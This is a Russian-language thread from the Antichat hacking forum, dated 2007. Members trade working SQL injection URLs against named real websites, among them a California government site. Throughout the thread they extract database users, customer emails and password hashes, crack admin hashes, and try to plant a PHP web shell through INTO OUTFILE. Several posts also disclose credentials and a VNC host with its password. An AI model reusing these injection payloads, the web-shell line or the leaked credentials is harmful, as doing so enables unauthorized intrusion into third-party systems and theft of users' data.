ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.07.2007, 15:02
|
|
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441
Репутация:
161
|
|
че-то не выводит нихрена хотя таблицу подобрал 
http://www.moto.com.ua/forum.php?id=1'+Union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,database(),16,17/*
тут походу слепая
http://www.ais.com.ua/news_detail.php?page_id=15'&news_id=816'
заранее ивеняюсь но в MS SQL не шарю... но помне так это оно еси нет то правьте
http://www.avto-bazar.com.ua/objava.asp?id=1'
тута стопудово
http://www.avtoreklama.com.ua/?show_other&rub=22'+union+select+version(),2/*
Последний раз редактировалось Y.Dmitriy; 03.07.2007 в 15:28..
|
|
|
03.07.2007, 15:44
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Нашел скульку на gocalif.ca.gov с PR - 7..
Думал будут денюшки =)
Не тут то было...
Скульку то я нашел...
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/*
Mysql version - 4.1.20-log
MySQL user - cttc@206.188.24.66
MySQL database - cttc_site
Экранирования кавычек нету:
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'Antichat%20-%20imho%20the%20best%20(c)%20b00zy_c0d3r',5,6/*
Даже права есть...
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'We%20have%20every%20right',5,6+from+mysql.user/*
File-priv тоже есть...проверили на /tmp/
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'%3C?php%20system($_GET[cmd]);%20?%3E',5,6+from+mysql.user+into+outfile+'/tmp/antichat.php'/*
Но вот пути для заливки шелла я не нашел =( |
|
|
|
03.07.2007, 15:55
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743
Репутация:
222
|
|
http://www.bikeshop.com.ua
Код:
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,user(),3,database(),5/*
К сожелению базы подобрать не смог.
Последний раз редактировалось Extremal; 03.07.2007 в 15:59..
|
|
|
|
03.07.2007, 16:34
|
|
Постоянный
Регистрация: 08.04.2007
Сообщений: 853
Провел на форуме:
5812656
Репутация:
1540
|
|
Сообщение от Extremal
http://www.bikeshop.com.ua
Код:
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,user(),3,database(),5/*
К сожелению базы подобрать не смог.
прав нету на просмотр списка таблиц
Последний раз редактировалось scrat; 03.07.2007 в 16:36..
|
|
|
|
03.07.2007, 16:37
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от scrat
прав нету на просмотр списка таблиц
O_O, что ещё придумаешь?)
Код:
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,concat(customers_email_address,0x3a,customers_password),3,4,5+from+customers+limit+0,1/*
Последний раз редактировалось ice1k; 03.07.2007 в 16:44..
|
|
|
|
03.07.2007, 20:17
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
прав нету на просмотр списка таблиц
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,version(),3,4,5/*
права то есть, только в 4й версии тупо списка таблиц нету 
-------------------------
заранее ивеняюсь но в MS SQL не шарю... но помне так это оно еси нет то правьте
тебе сюда -
http://forum.antichat.ru/thread30501-mssql.html
Последний раз редактировалось Серенький; 03.07.2007 в 20:21..
|
|
|
|
03.07.2007, 22:15
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743
Репутация:
222
|
|
Спасиб ice1k
Код:
http://www.belexpocentr.ru/show.php?id=-1+union+select+1,2,3,4,5,version(),7,database(),user(),10,11,12,13,14,15,16,17,18,19,20,21/*
Код:
http://www.sibezrcs.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Базы как всегда не смог подобрать...
Код:
http://orden.elite-games.ru/article.php?id=-1+union+select+1,2,3,4,version(),database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
тута ВРОДЕ бы не хавтает прав.или тупо нету баз=)
Код:
http://www.korsteklobor.ru/category.php?id=-1+union+select+1,2,3/*
Тута я ни че не могу вывести на поля
Последний раз редактировалось Extremal; 04.07.2007 в 13:49..
|
|
|
|
04.07.2007, 00:29
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
Comedy Club Молдованский стайл
http://www.comedy.md/residents.php?id=43'
версия, как мы узнаем, пятая, что не может не радовать наши шалавливые ручки..
http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database())/*
на сайте есть форум phpbb, стандартный префикс к таблицам у которого phpbb_, молдованские админы ничего не стали придумывать, им итак, видно, весело. находим запись пользователя с подозрительным ником admin и хеш к его паролю - 92608e8ef9fd8c3f4e896c63e0e26e79, обращаемся к passcracking.ру, милый сервис просит подождать часок-другой-пятый, идем на форум, глядим на юзера следующего за админом с менее амбициозным ником zornig, но тем не менее с правами админа. Хеш 7694f4a66316e53c8cdd9d9954bd611d уж слишком брутальный для любого админа, ибо пароль к нему просто буква q.
админка по адресу
http://www.comedy.md/controlpanel/
нагло плюется в нашу сторону ошибкой. А жаль ведь мы уже нашли таблицу tbladmins
http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,table_name)+f rom+information_schema.tables+limit+46,1/*
и выловили из нее интересные вещи :
http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,admid,adminlo gin,adminpwd,status)+from+tbladmins+limit+0,1/*
4:comedy:f682468003680f7e3add8888ce60ffa51b6a917b
хеш, кстати, sha1, ну да бог с ним, все равно он нам не понадобится...
конец.
Последний раз редактировалось Серенький; 04.07.2007 в 13:19..
|
|
|
|
04.07.2007, 00:46
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от Isis
Нашел скульку на gocalif.ca.gov с PR - 7..
Думал будут денюшки =)
Не тут то было...
Скульку то я нашел...
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/*
Mysql version - 4.1.20-log
MySQL user - cttc@206.188.24.66
MySQL database - cttc_site
Экранирования кавычек нету:
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'Antichat%20-%20imho%20the%20best%20(c)%20b00zy_c0d3r',5,6/*
Даже права есть...
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'We%20have%20every%20right',5,6+from+mysql.user/*
File-priv тоже есть...проверили на /tmp/
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'%3C?php%20system($_GET[cmd]);%20?%3E',5,6+from+mysql.user+into+outfile+'/tmp/antichat.php'/*
Но вот пути для заливки шелла я не нашел =( Вообщем пол дня пытался подобрать имя к хоум дире, получил след результаты.
пути:
/etc/httpd/conf/httpd.conf - апач
/var/www/html - htdocs
таблица:
users
Код:
http://www.visitcalifornia.com/page.php?id=-1+union+select+1,2,3,user_name,password,email,7,8,9,10,11,12,13,14,15+from+users+limit+0,1/*
лимит в помощь
админка(cms):
http://gocalif.ca.gov/site/cms/index.php
vnc client:
host=64.160.126.137
port=5900
password=9555cd837f884713
ЗЫ
Название хоум диры ппц ((
|
|
|
|
04.07.2007, 09:45
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743
Репутация:
222
|
|
Код:
http://shirley.ru/cat.php?id=-1+union+select+uname,pass+from+shir_users+limit+1,1/*
cсливаем базу юзеров по 1
Код:
http://www.vikinggames.hu/product.php?id=-1+union+select+1,username,password,4,email_address,6,7+from+timesheet_user+limit+0,1/*
тут тож
Код:
http://board.kinklub.com/ind.php?pn=2&id_categ=1+union+select+1,2,3,4,5,userLogin,userPassword,8,9,10,11,12,13,14,15+from+admins/*
логин: admin
пасс: admin
Код:
http://www.fotovilag.hu/links/cat.php?id=1+union+select+1,2,user_name,4,user_password,6+from+user+limit+1,15/*&menu_id=5
С помощью лимита сливаем тамблицу юзеров...
Последний раз редактировалось Extremal; 04.07.2007 в 17:17..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?403924){kind=avatar}
Линейный вид
